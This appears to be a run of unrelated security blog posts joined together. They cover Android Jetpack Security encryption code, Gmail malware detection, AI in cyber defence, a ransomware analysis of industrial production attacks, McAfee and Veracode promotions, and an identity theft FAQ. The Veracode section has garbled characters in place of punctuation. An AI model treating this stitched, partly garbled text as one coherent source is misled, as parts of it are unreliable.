A version of this blog was originally published on 20 May 2019.

The post How to write a business continuity plan: the easy way appeared first on IT Governance UK Blog.

Data Encryption on Android with Jetpack Security

Posted by Jon Markoff, Staff Developer Advocate, Android Security

Illustration by Virginia Poltrack

Have you ever tried to encrypt data in your app? As a developer, you want to keep data safe, and in the hands of the party intended to use. But if you’re like most Android developers, you don’t have a dedicated security team to help encrypt your app’s data properly. By searching the web to learn how to encrypt data, you might get answers that are several years out of date and provide incorrect examples.

The Jetpack Security (JetSec) crypto library provides abstractions for encrypting Files and SharedPreferences objects. The library promotes the use of the AndroidKeyStore while using safe and well-known cryptographic primitives. Using EncryptedFile and EncryptedSharedPreferences allows you to locally protect files that may contain sensitive data, API keys, OAuth tokens, and other types of secrets.

Why would you want to encrypt data in your app? Doesn’t Android, since 5.0, encrypt the contents of the user's data partition by default? It certainly does, but there are some use cases where you may want an extra level of protection. If your app uses shared storage, you should encrypt the data. In the app home directory, your app should encrypt data if your app handles sensitive information including but not limited to personally identifiable information (PII), health records, financial details, or enterprise data. When possible, we recommend that you tie this information to biometrics for an extra level of protection.

Jetpack Security is based on Tink, an open-source, cross-platform security project from Google. Tink might be appropriate if you need general encryption, hybrid encryption, or something similar. Jetpack Security data structures are fully compatible with Tink.

Key Generation

Before we jump into encrypting your data, it’s important to understand how your encryption keys will be kept safe. Jetpack Security uses a master key, which encrypts all subkeys that are used for each cryptographic operation. JetSec provides a recommended default master key in the MasterKeys class. This class uses a basic AES256-GCM key which is generated and stored in the AndroidKeyStore. The AndroidKeyStore is a container which stores cryptographic keys in the TEE or StrongBox, making them hard to extract. Subkeys are stored in a configurable SharedPreferences object.

Primarily, we use the AES256_GCM_SPEC specification in Jetpack Security, which is recommended for general use cases. AES256-GCM is symmetric and generally fast on modern devices.


val keyAlias = MasterKeys.getOrCreate(MasterKeys.AES256_GCM_SPEC)

For apps that require more configuration, or handle very sensitive data, it’s recommended to build your KeyGenParameterSpec, choosing options that make sense for your use. Time-bound keys with BiometricPrompt can provide an extra level of protection against rooted or compromised devices.

Important options:

  • userAuthenticationRequired() and userAuthenticationValiditySeconds() can be used to create a time-bound key. Time-bound keys require authorization using BiometricPrompt for both encryption and decryption of symmetric keys.
  • unlockedDeviceRequired() sets a flag that helps ensure key access cannot happen if the device is not unlocked. This flag is available on Android Pie and higher.
  • Use setIsStrongBoxBacked(), to run crypto operations on a stronger separate chip. This has a slight performance impact, but is more secure. It’s available on some devices that run Android Pie or higher.

Note: If your app needs to encrypt data in the background, you should not use time-bound keys or require that the device is unlocked, as you will not be able to accomplish this without a user present.


// Custom Advanced Master Key
val advancedSpec = KeyGenParameterSpec.Builder(
"master_key",
KeyProperties.PURPOSE_ENCRYPT or KeyProperties.PURPOSE_DECRYPT
).apply {
setBlockModes(KeyProperties.BLOCK_MODE_GCM)
setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
setKeySize(256)
setUserAuthenticationRequired(true)
setUserAuthenticationValidityDurationSeconds(15) // must be larger than 0
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
setUnlockedDeviceRequired(true)
setIsStrongBoxBacked(true)
}
}.build()

val advancedKeyAlias = MasterKeys.getOrCreate(advancedSpec)

Unlocking time-bound keys

You must use BiometricPrompt to authorize the device if your key was created with the following options:

  • userAuthenticationRequired is true
  • userAuthenticationValiditySeconds > 0

After the user authenticates, the keys are unlocked for the amount of time set in the validity seconds field. The AndroidKeystore does not have an API to query key settings, so your app must keep track of these settings. You should build your BiometricPrompt instance in the onCreate() method of the activity where you present the dialog to the user.

BiometricPrompt code to unlock time-bound keys

// Activity.onCreate

val promptInfo = PromptInfo.Builder()
.setTitle("Unlock?")
.setDescription("Would you like to unlock this key?")
.setDeviceCredentialAllowed(true)
.build()

val biometricPrompt = BiometricPrompt(
this, // Activity
ContextCompat.getMainExecutor(this),
authenticationCallback
)

private val authenticationCallback = object : AuthenticationCallback() {
override fun onAuthenticationSucceeded(
result: AuthenticationResult
) {
super.onAuthenticationSucceeded(result)
// Unlocked -- do work here.
}
override fun onAuthenticationError(
errorCode: Int, errString: CharSequence
) {
super.onAuthenticationError(errorCode, errString)
// Handle error.
}
}

To use:
biometricPrompt.authenticate(promptInfo)

Encrypt Files

Jetpack Security includes an EncryptedFile class, which removes the challenges of encrypting file data. Similar to File, EncryptedFile provides a FileInputStream object for reading and a FileOutputStream object for writing. Files are encrypted using Streaming AEAD, which follows the OAE2 definition. The data is divided into chunks and encrypted using AES256-GCM in such a way that it's not possible to reorder.

val secretFile = File(filesDir, "super_secret")
val encryptedFile = EncryptedFile.Builder(
secretFile,
applicationContext,
advancedKeyAlias,
FileEncryptionScheme.AES256_GCM_HKDF_4KB)
.setKeysetAlias("file_key") // optional
.setKeysetPrefName("secret_shared_prefs") // optional
.build()

encryptedFile.openFileOutput().use { outputStream ->
// Write data to your encrypted file
}

encryptedFile.openFileInput().use { inputStream ->
// Read data from your encrypted file
}

Encrypt SharedPreferences

If your application needs to save Key-value pairs - such as API keys - JetSec provides the EncryptedSharedPreferences class, which uses the same SharedPreferences interface that you’re used to.

Both keys and values are encrypted. Keys are encrypted using AES256-SIV-CMAC, which provides a deterministic cipher text; values are encrypted with AES256-GCM and are bound to the encrypted key. This scheme allows the key data to be encrypted safely, while still allowing lookups.

EncryptedSharedPreferences.create(
"my_secret_prefs",
advancedKeyAlias,
applicationContext,
PrefKeyEncryptionScheme.AES256_SIV,
PrefValueEncryptionScheme.AES256_GCM
).edit {
// Update secret values
}

More Resources

FileLocker is a sample app on the Android Security GitHub samples page. It’s a great example of how to use File encryption using Jetpack Security.

Happy Encrypting!

Improving Malicious Document Detection in Gmail with Deep Learning




Gmail protects your incoming mail against spam, phishing attempts, and malware. Our existing machine learning models are highly effective at doing this, and in conjunction with our other protections, they help block more than 99.9% of threats from reaching Gmail inboxes.

One of our key protections is our malware scanner that processes more than 300 billion attachments each week to block harmful content. 63% percent of the malicious documents we block differ from day to day. To stay ahead of this constantly evolving threat, we recently added a new generation of document scanners that rely on deep learning to improve our detection capabilities. We’re sharing the details of this technology and its early success this week at RSA 2020.


Since the new scanner launched at the end of 2019, we have increased our daily detection coverage of Office documents that contain malicious scripts by 10%. Our technology is especially helpful at detecting adversarial, bursty attacks. In these cases, our new scanner has improved our detection rate by 150%. Under the hood, our new scanner uses a distinct TensorFlow deep-learning model trained with TFX (TensorFlow Extended) and a custom document analyzer for each file type. The document analyzers are responsible for parsing the document, identifying common attack patterns, extracting macros, deobfuscating content, and performing feature extraction.


Strengthening our document detection capabilities is one of our key focus areas, as malicious documents represent 58% of the malware targeting Gmail users. We are still actively developing this technology, and right now, we only use it to scan Office documents.




Our new scanner runs in parallel with existing detection capabilities, all of which contribute to the final verdict of our decision engine to block a malicious document. Combining different scanners is one of the cornerstones of our defense-in-depth approach to help protect users and ensure our detection system is resilient to adversarial attacks.

We will continue to actively expand the use of artificial intelligence to protect our users’ inboxes, and to stay ahead of attacks.

Cyber Defence: How Machine Learning and AI are Eliminating the Complexity

Machine learning and artificial intelligence are changing the way that businesses operate. Whether it’s on the factory floor or in back-end IT, automated services and machines are increasing speed and productivity all while freeing up workers to focus on tasks which require a totally different set of skills.

Alongside this, we are seeing the role of AI in cyber security increase as well as the number of artificial intelligence security tools being used too. This is all because AI is trained to learn, develop and grow using the data it is provided with. Essentially, an AI system is constantly in a state of change and improvement. In an environment where hackers and security threats are everywhere and constantly looking for a way into a system, protecting company data has never had such a high priority. With this in mind, it’s important to understand exactly what is AI in cyber security and just how is AI in security being implemented?    

The Purpose of Cybersecurity

AI is proving to be one of the most influential and game-changing technology advancements in the business world. As more and more enterprises embrace the digital sphere, companies are finding new and exciting ways to implement AI-based functions into every platform and software tool at their disposal. However, one of the natural consequences of this is that cybercriminals view this increasing digitization as a definite window of opportunity.

A cyber threat is basically any act that intends to steal, harm or digitally affect data in some way. They are more than just a nuisance, they can have serious and damaging effects. Cyber-attacks can cause electrical blackouts, involve the theft of valuable or sensitive data like medical records, disrupt phone and computer networks or just paralyze entire systems making any data unavailable. They can cripple a company in a heartbeat.

Some of the most common forms of cyber threats include:

  • Phishing – Email-borne attacks that involve tricking recipients into disclosing confidential information or downloading malware by clicking on a link.
  • Malware – This is usually a piece of software that performs a malicious task on a targeted device or network such as corrupting data or taking control of a system.
  • Trojans – A form of malware that enters a system looking like one thing, such as a standard piece of software, before letting out a malicious code once inside.
  • DDoS – An attacker takes over many devices at once and uses them to invoke the functions of a target system causing it to crash from an overload of demand.
  • Data Breaches – A data breach is simply where an attacker hacks or finds a way into a system before stealing data directly.

Cyber threats never stay the same for very long. There are millions of them being created every year all becoming more potent than the last and this is where machine learning and artificial intelligence is so important in regards to combatting cyber threats.

How AI Can Help in Cyber Defence?

This is where AI can help massively. Machine learning-based technologies are particularly efficient at detecting unknown threats to a network. This is where computers use and adapt algorithms depending on the data received and improve their functions. Essentially, this attempts to create a machine that can predict threats and identify anomalies with much greater accuracy and speed than a human equivalent could do.

One of the other examples of AI in cyber security involves using supervised algorithms. These can uncover threats based on the labelled data they have been trained on. Based on this, the system can then make educated decisions pertaining to new data and determine whether it is harmful or not. Thousands of instances of malware code can be used as learning data for supervised algorithms to learn from, creating an extremely efficient system for detecting incoming threats.

The Future of Cyber Defence

As it is an environment that changes at a lightning-quick pace, trying to stay ahead of technological developments as the importance of cybersecurity for digital marketing and other sectors is crucial to business sustainability. However, there are some trends to say aware of regarding cyber defences in 2020:

  • Predicting Threats Is Critical – More and more we’ll see companies concentrating on detecting and predicting cyber threats using AI. As technology and awareness develop in regards to using and adopting AI as a part of cyber defences, the need to predict and respond swiftly and accurately will increase in turn.
  • It Will Become Prevalent For Consumers – Consumers are starting to realize that passwords are not providing enough account protection and that their accounts are increasingly vulnerable. AI can recognize returning users and will be key in protecting the entire customer journey, from creation through to transaction. This should allow businesses to form trusting bonds with their customers as they are protected by more than just a password.
  • AI Will See A Sharp Rise In Usage – According to Capgemini, 69% of enterprises believe AI will be necessary in order to respond to cyberattacks. The majority of companies say they are counting on AI to help identify and thwart attacks that could cause increasingly expensive losses.

Final Thoughts

It can be a worrying time for businesses out there who are concerned about the growing threat of cyber-attacks. However, by combining security methods with AI and machine learning it is possible to protect yourself accordingly. By being proactive, staying up-to-date with the latest threats and working with industry professionals, you’ll be able to stay on top of even the most serious of cyber threats out there and ensure your data stays protected.

About the author

David Pittaway is a creative content writer for Aumcore, a digital marketing agency based in New York. He writes on a variety of topics that range from SEO, Machine Learning to crafting the perfect creative content marketing plan

The post Cyber Defence: How Machine Learning and AI are Eliminating the Complexity appeared first on CyberDB.

Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which  expand the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

  • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
  • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
  • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.

Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software driving the company temporarily offline and negatively affecting production.

Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

As recently as February 2020, the Cybersecurity Infrastructure and Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shut down of operations that lasted two days.

Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

  • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
  • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
  • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
  • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
  • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
  • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
  • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
  • Note, that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructures. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.

Introducing McAfee Unified Cloud Edge: Cloud-Native Security for SASE

McAfee is thrilled to announce the availability of Unified Cloud Edge, the most complete security solution for Secure Access Service Edge (SASE) architectures. Enterprises today have lost visibility and control over their data as it travels from any device, in any location, directly to cloud services. Unified Cloud Edge addresses this challenge with a unified security architecture that protects data from device-to-cloud while protecting against cloud-native breach attempts that are invisible to the corporate network.  

McAfee Unified Cloud Edge is part of MVISION, the cloud-native security platform from McAfee. It begins with three core technologies converged into a single solution:  

  1. Cloud Access Security Broker (CASB): Direct API and reverse proxy-based visibility and control for cloud services 
  2. Secure Web Gateway (SWG): Proxy-based advanced protection against web-based attacks; visibility and control over web traffic and unsanctioned cloud services 
  3. Data Loss Prevention (DLP): Agent- and network-based visibility and control over sensitive data 

Simplified architecture for McAfee Unified Cloud Edge

These technologies create a secure environment for the adoption of cloud services and enablement of access to the cloud from any device for ultimate workforce productivity. Companies can accelerate their business through faster adoption of transformative cloud services by protecting their data and assets with Unified Cloud Edge.  

There are two prominent areas of convergence engineered to create this solution: 

  1. CASB and Cloud-based SWG are now managed together. We converged our cloud-based Web Gateway technology into our industry-leading CASB, giving customers one location to protect data and defend against threats in the cloud, along with traffic to and from the cloud. The cloud-based web gateway has been re-architected to enterprise scale, with an industry-high 99.999% availability. New capabilities are enabled by cross-referencing web and cloud intelligence in a single policy.   

Policy example: Our cloud-native secure web gateway using CASB risk ratings to block all high-risk cloud services.

  1. All data loss prevention (DLP) enforcement points share the same classifications, reporting, and workflows. DLP at the device, in motion through the network, and in the cloud now share one source for data classifications and a single location for reporting and remediation workflows. McAfee ePO is the starting point, where classifications built for on-premises DLP are pushed to the cloud in one click for use in any cloud service. All incidents then flow back to ePO for a single location to conduct reporting and remediation workflows. This eliminates the need to query multiple sources for incident data and to manually join search results for incident response. 

Policy example: One-click push for all DLP content rules to go to CASB.

McAfee Unified Cloud Edge Solution Brief

Protect data from device to cloud, and prevent cloud-native threats invisible to the corporate networks.

Download Now

Expanding the Threat Prevention Capabilities of Unified Cloud Edge with Light Point Security 

To deliver a complete security architecture for a Secure Access Service Edge (SASE), we have not only dedicated internal teams to innovation, but also looked to the market for pioneers to join our team and contribute their technology and expertise. McAfee has agreed to acquire Light Point Security, a pioneer in browser isolation founded by former employees of the National Security Agency (NSA) to expand the threat prevention capabilities of Unified Cloud Edge.  

Here’s why we decided to bring Light Point Security into the McAfee family. The web remains a primary source of malware infiltration for every enterprise. Today, our secure web gateway technology has a uniqueindustryleading approach to malware prevention – real-time emulation. This is highly effective, high-performance approachEmulation removes the vast majority of malware in milliseconds as traffic is processed. The next evolution is removing the ability for malicious code to reach an end-user altogether. 

Light Point Security’s browser isolation technology takes the end user’s web browsing session and isolates the page remotely in a secure location, then replicates an interactive image of the session in the user’s browser with a technique called pixel mapping.  This provides the end user with protection against web-based threats because malicious code can’t leave the isolated browser, which is remote from their endpointWe plan to integrate this technology into our cloud-native secure web gateway for use in any web security policy.  

How Does Unified Cloud Edge Reduce the Cost and Complexity of Security in Secure Access Service Edge (SASE) Architecture?  

Secure Access Service Edge (SASE) is an architectural framework that dissolves the data center perimeter and creates a new edge formed dynamically by any cloud service and devices in any location. Security policy shifts to the user session and data, away from a defined perimeter of control. This is a critical evolution that addresses the unpredictable nature of cloud service adoption and mobile users.  

In a SASE architecture there are two distinct elements. How data is routed to the cloud, and how it is secured. At McAfee, we are focused on securing data and preventing threats from device-to-cloud. With Unified Cloud Edge, we are releasing the most complete, cloud-native, solution for security in a SASE architecture.  

At the device, Unified Cloud Edge applies industry-leading data protection technologies, including encryption, to monitor sensitive data in use, at rest, and in motion.  

Through the web, we route traffic from managed devices in any location and from physical networks through our cloud-native proxy to apply access control, data protection, and threat prevention policies. 

In the cloud, Unified Cloud Edge integrates directly with cloud services to again apply industry-leading data protection to monitor sensitive data entering the cloud, created in the cloud, and attempting to leave cloud services. With User and Entity Behavior Analytics (UEBA), cloud-native threats can be detected within and across multiple cloud service providers.  

Enterprises have a clear choice. They can either stitch together CASB, DLP and SWG solutions from different vendors, which increases operational overhead from added cost and complexity. Or, they can choose a solution which converges these enforcement points into unified experiences with singular context from device-to-cloud. With Unified Cloud Edge, enterprises have a converged approach to security in a SASE architecture which dramatically reduces their cost and complexity, delivering maximum business agility from the cloud.  

Register for our LIVE Webcast with IDC

Learn more about Unified Cloud Edge here: www.mcafee.com/unifiedcloud

The post Introducing McAfee Unified Cloud Edge: Cloud-Native Security for SASE appeared first on McAfee Blogs.

Cloud Security Guide to RSA 2020 – Where the World Talks Cloud Security

The RSA conference is an expanse of innovation, networking, and insight through countless conversations we’re able to have with customers seeking to solve cloud security challenges. The common theme when it comes to cloud contrasts from what you may think about cybersecurity.

CASB has been a pivotal technology in this journey and we’ve heard it consistently. Our customers are seen as strategic enablers in their organizations by securing data in the cloud apps their users want to adopt, without friction to their experience. During the week of RSA, there will be multiple exclusive events hosted by McAfee. See the full schedule of events and presentations below:

Cloud Security Alliance Dedicated Event

Each year, the Cloud Security Alliance hosts a one day event before the RSA Conference. In the 11th Cloud Security Alliance Summit at the RSA Conference, thought leaders from multi-national enterprises, government, cloud providers and the information security industry will share best practices in cloud privacy and security. We will also explore new frontiers that are accelerating change in information security, such as artificial intelligence, quantum supremacy, blockchain, and fog computing.

Check out our CSA Summit Keynote—all you need is your RSA Expo Pass!

Monday, February 24 | 1:00PM – 1:20PM | Moscone West, Room #3014

McAfee Theater Sessions

The conference welcomes industry experts and professionals to the McAfee stage. Check out one of our 15-minute mini-theater sessions, where you will hear from our customers about how they made the Cloud their most secure environment for business. Schedule is available via the QR Code and listed below.

Oh, and did I mention the T-shirt?

 

Stop by our RSA Booth #N5745 and meet with a Cloud Security Specialist for a demo on how we can work together to make the cloud your most secure environment for business.

 

 

The post Cloud Security Guide to RSA 2020 – Where the World Talks Cloud Security appeared first on McAfee Blogs.

Veracode Wins Three Awards for AppSec Excellence as a Leader in DevSecOps

We???re excited to announce that we have received three awards for our innovative solutions in application and information security!

Info Security Products Guide Silver Winnerツ?ツ? ツ?ツ? ツ?ツ?Cyber Security Excellence Awards Winnerツ?ツ?ツ?ツ? ツ?Cyber Defense Magazine InfoSec Awards Winner

Info Security Products Guide, the industry???s leading information security research and advisory guide, named Veracode a Silver Award winner in their Application Security and Testing category for the 16th Annual 2020 Info Security PG???s Global Excellence Awards. This honor recognizes cybersecurity and information technology vendors who offer advanced and innovative products, solutions, and services that help propel the industry forward.ツ?ツ? ツ?ツ?

Additionally, the 2020 Cybersecurity Excellence Awards named Veracode a gold winner in their software category as a leading SaaS-based AppSec platform that empowers developers and accelerates DevSecOps. Recipients of this award were selected both on the strength of their nomination and on a popular vote by members of the information security community.

We???re also honored to receive an award from Cyber Defense Magazine (CDM), the industry???s leading electronic information security publication, which named Veracode the winner of their Best Product for Application Security award.

For the past six months, CDM surveyed 3,200 pioneering companies that are changing the InfoSec game with advanced security products and services. Submissions were open to any startup, early-stage, later-stage, or public organization, and judges ultimately selected just 10 percent of those candidates to receive a coveted InfoSec Award during RSA Conference 2020.

???With cybercrime heading into the tens of billions of records stolen and potentially trillions of dollars in damages, we are proud to recognize Veracode as an award-winning innovator that offers a new approach to defeat these criminals,??? said Pierlugi Paganini, editor-in-chief, Cyber Defense Magazine.

This is Cyber Defense Magazine's eighth year honoring InfoSec leaders from around the world. When selecting winners, judges looked for forward-thinking leaders in InfoSec that offer cost-effective solutions and help propel the industry forward in unexpected ways.

???These winners are the most innovative and proactive cybersecurity companies and service providers on the planet who are working to bring tomorrow???s cybersecurity solutions to market, today,??? said Gary S. Miliefsky, Publisher of Cyber Defense Magazine.

Like CDM, Veracode is dedicated to thinking about the future of information security. This award exemplifies our dedication to creating groundbreaking solutions that help organizations secure the software they need to power their world.ツ?ツ?

You can find the full list of CDM's winnersツ?here and visit us at RSA Conference 2020 (booth N-5553) to learn more about our application security platform.

Frequently Asked Questions About Identity Theft

Identity Theft Protection

Frequently Asked Questions About Identity Theft

The more you know about identity theft, the better prepared you will be to prevent it from happening to you. Here are some commonly asked questions about identity theft.

What is identity theft?

Identity theft is when a person pretends to be you to access money, credit, medical care, and other benefits. They acquire your identity by stealing and using your personal information like government ID number or bank account number. Once they have this information, identity thieves can really wreak havoc on your life; for example, they can clear out your bank account. They can also impersonate you in order to get a job or commit a crime. It can take a long time to clean up the mess.

Does identity theft only have to do with stealing money or credit?

No, financial identity theft, using your personal information to access your money or credit, is not the only type of identity theft, although it is the most common. There are other kinds of identity theft identity theft. Medical identity theft is when someone uses your information to receive medical care. Criminal identity theft is when someone takes over your identity and assumes it as his or her own. They can then give your name to law enforcement officers and voilà—you have a criminal record.

What are some things I can do to protect my identity online?

  • Be choosy. Be careful when sharing personal information online. Just because a website is asking for your information doesn’t mean it’s necessary to provide it to them. Ask who wants the information and why. Also, limit the amount of information you share on social media. Does everyone need to know the year you were born?
  • Think twice. Use caution when clicking on links and opening email attachments. If the link or attachment is from someone you don’t know, don’t open it.
  • Use secure Wi-Fi. When shopping or banking online, make sure you are using a secure wireless connection. Even better, use a Virtual Private Network (VPN) to encrypt your data and protect your online activity.
  • Permanently delete files from your PC. Putting your files in the recycle bin isn’t enough. Your device will still have the files and therefore, are accessible to identity thieves. Use security software that includes a digital shredder to make sure those files are truly wiped from your PC.
  • Install security software. Make sure all your devices have comprehensive security software that protects all your PCs, Macs, tablets and smartphones.

What are things I can do to protect my identity offline?

  • Shred. Use a cross-cut shredding machine, or scissors to shred old credit card statements, offers, receipts, etc., to prevent dumpster divers from obtaining your information and creating accounts in your name.
  • Have a locked mailbox. This will keep thieves from stealing your mail, especially bank statements and credit card offers.
